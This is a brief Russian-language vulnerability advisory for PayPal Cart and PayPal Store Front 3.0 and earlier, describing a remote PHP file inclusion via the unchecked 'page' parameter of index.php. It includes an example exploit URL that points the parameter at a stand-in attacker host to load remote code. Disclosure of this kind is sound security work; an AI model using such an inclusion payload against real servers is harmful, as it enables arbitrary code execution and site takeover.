Программа: PayPal Cart, PayPal Store Front 3.0 и более ранние версии 

Уязвимость обнаружена в PayPal Cart и PayPal Store Front. Злонамеренный пользователь может выполнить произвольный PHP код на уязвимом сервере.
Программное обеспечение не проверяет параметр «page» в сценарии «index.php». В результате удаленный пользователь может выполнить произвольный PHP код с привилегиями Web сервера. 

Пример/Эксплоит: 

http://www.vulnsite.com/index.php?do= ext&page=http://www.attacker.com/index 

Где http://www.attacker.com/index.php



Оставить мнение